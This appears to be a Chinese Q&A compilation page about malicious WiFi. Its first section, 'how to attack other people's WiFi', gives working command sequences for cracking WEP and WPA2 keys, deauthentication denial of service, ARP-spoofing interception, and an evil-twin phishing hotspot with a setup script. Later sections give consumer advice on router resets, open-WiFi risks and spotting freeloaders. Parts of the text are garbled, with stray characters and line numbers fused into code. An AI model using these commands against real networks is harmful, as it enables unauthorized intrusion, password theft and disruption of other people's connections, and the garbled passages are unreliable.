恶意无线网络

C. 怎么攻击别人wifi

1.保密性
我们攻击WIFI的第一个思路就是从保密性出发，我们希望从无线系统中获取用户的明文数据。首先，我们知道WIFI的的认证加密主要有以下四种方式：OPEN（无加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。
OPEN的WIFI没有采取认证加密措施，任意用户均可链接WIFI，用户数据在BSS（基本服务集）中明文传输，恶意用户没有任何门槛就可连接，然后通过中间人攻击即可获取用户的数据（SSL、SSH等需要其他工具）。如下图所示：
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码，然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。
WEP大概如下：
airomp-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下：
airomp-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据，抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包，更快的获取handshake
aircrack-ng -w 你的字典文件备老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP，通过中间人的方式获取用户仿和明文数据，或者直接用wireshark抓取加密包，然后通过airdecap-ng工具解密，然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功，取决于你字典是否强大，此时我们可以想办法诱骗用户主动输入WIFI密码，比如我们创建一个和目标AP具有同样ESSID的软AP，用户可以连接上，单在浏览网页时会弹出一个虚假的认证页面，告诉用户必须输入WIFI的密码，用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码，但此密码并没有去验证，如果用户输入错误，也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验，成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性，通常通过DOS攻击来实现，比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包，迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接，从而耗尽AP的资源造成DOS攻击
3.真实性
（1）恶意用户进入无线系统后，可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗，ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页含桐时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情，比如获取cookie，嵌入js，结合beef进一步攻击等等。。。
（2）伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器（必须先安装isc-dhcp-server），开启路由，开启系统转发，开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点，并可以上网，但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据，在WIFI攻击这块貌似用处不大。
5.不可抵赖性

D. 无线网络连上了但被人恶意限制了，拒绝访问，怎么办

可以通过恢复出厂设置然后登陆后台重新设置密码来解决
第一：在路由器的后面有一个针孔（这个针孔就是路由器恢复出厂设置的按钮，用针插进去10秒以上路由器就会自动的恢复出厂设置并清除之前设置好的所有内容包括路由器的登录用户名和密码）

第二：登录路由器后台并设置好密码之后如何设置路由器的有效上网参数？

第三：在经过前半部分的向导设置好路由器的登录密码之后会进去进入到“上网方式”的设置（这个根据你的运营商所提供的数据进行设置，如果你的运营商是拨号上网的那么必需选拨号才能正常连接到互联网上）

如何设置路由器的WIFI名称和WIFI帐号密码？

第四步：完成宽带帐号的密码设置之后会自动进入到WIFI的设置，“无线名称”和“无线密码'（这个就是设置WIFI帐号和WIFI密码的可随意填写方便记住就可以）

这样整个路由器的设置就完成了

E. 不安全无线网络什么意思对电脑资料有危险吗

指连接的无线网络没有加密，存在风险。

正常的无线网络信号的传播都要以wap、wep等方式加密，这样设备发送的数据就不能被别人截获破解，而不设置密码的无线网络是不安全的，容易存在资料泄露、密码被盗等安全风险。

另外未加密的wifi可能是黑客恶意布置的陷阱，主要是用来获取用户的信息，如果手机自动搜索并连上，手机上的一些重要数据和信息就会被黑客截获，手机上未经加密处理的用户名和账户信息及账户密码就会不知不觉得泄露，从而被黑客窃取财产。

WIFI虽然给上网提供了便利，但也为安全留下隐患。发现免费WIFI千万不要随便登录，这可能是黑客用来入侵你手机的工具。

江西一名男子曾使用没有设置密码就能直接登录的免费WIFI，并用手机输入自己网银卡号密码，结果导致账户3万多元被转走。

(5)恶意无线网络扩展阅读

多种方法增强WIFI安全

1、公共场合连接WiFi时请同商家确认好WiFi名称。

2、没有密码的公共WiFi慎用。

3、使用支付APP时，尽量使用运营商的4G网络。

4、在办公网络架设无线路由器必须经过公司批准并进行安全安装。

5、建议隐藏SSID(服务集标识)，绑定接入设备的MAC地址。

6、日常不用WiFi时关闭手机和笔记本电脑的无线局域网功能，以防自动连接恶意WiFi。

F. 如何查看自己的无线WiFi是否有被别人恶意盗用

方法一：路由器查询法
打开浏览器，在地址栏输入IP:192.168.1.1进入无线路由器的管理界面。
进入后会显示输入账号密码界面，账号一般是admin，密码为admin。
登录成功界面。
点击左侧的“无线设置”，点击“主机状态”可以看到无线连接的主机列表。
END
方法二：腾讯电脑管家查询法
打开腾讯电脑管家。
在腾讯电脑管家右下角，点击“工具箱”，进入工具列表界面。
在“安全上网”区域选择点击“无线安全助手”。
点击“立即启用”，进入网络列表显示界面。
检测无线网络，显示无线连接的主机列表。
END
方法三：网络测试法
当你感觉到自己的无线网网速很慢，就说明你的Wifi有可能已经在被盗用中。
有时间还老掉线，就说明你的Wifi有可能已经在被盗用中。
检查你的路由器。请注意观察路由器上面一系列状态指示灯，其中有电源灯，网络连接灯，无线连接灯。如果无线灯不亮，家里所有的电脑都无法上网，那么可以肯定没人盗用。